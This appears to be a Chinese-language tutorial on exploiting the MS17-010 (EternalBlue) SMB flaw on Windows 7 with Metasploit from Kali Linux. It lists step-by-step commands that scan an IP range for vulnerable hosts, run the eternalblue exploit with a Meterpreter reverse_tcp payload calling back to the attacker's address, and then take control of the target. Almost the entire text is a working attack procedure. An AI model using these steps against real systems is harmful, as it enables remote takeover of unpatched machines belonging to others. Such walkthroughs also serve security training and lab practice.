MS17_010漏洞攻击Windows7

攻击主机系统：Kali Linux 2018

目标主机系统：Windows7 x64

1.攻击主机启动Metasploit：

 msfconsole 

 2.查找MS17_010漏洞相关的信息：

 search ms17_010 

一次查找不到就多查找几次

 3.扫描到四个模块

模块二：探测主机是否存在MS17_010漏洞

模块三：漏洞利用

使用模块二来探测MS17_010漏洞

 use auxiliary/scanner/smb/smb_ms17_010 

 4.设置想要探测的目标主机的ip或者ip范围（如果单个ip就设置一个ip就可以了，这里我们演示扫ip范围）

 set RHOSTS 192.168.48.125-192.168.48.135 

5. 启动探测

 exploit

回显[+]二不是[*]的就为存在该漏洞的主机

 6.探测到了目标主机后，启动漏洞利用模块

 use exploit/windows/smb/ms17_010_eternalblue 

 7.查看需要设置的参数

 show options 

 8.查看payloads：

 show payloads 

 9.设置payload：

 set payload windows/x64/meterpreter/reverse_tcp 

 10.设定目标主机：

 set RHOST 192.168.48.130 

 11.设定攻击主机：

 set LHOST 192.168.48.131 

12. 开始攻击：

 exploit 或者 run 

13. 攻击成功，使用meterpreter模块开始控制目标主机

 14.查看目标主机的信息：

 sysinfo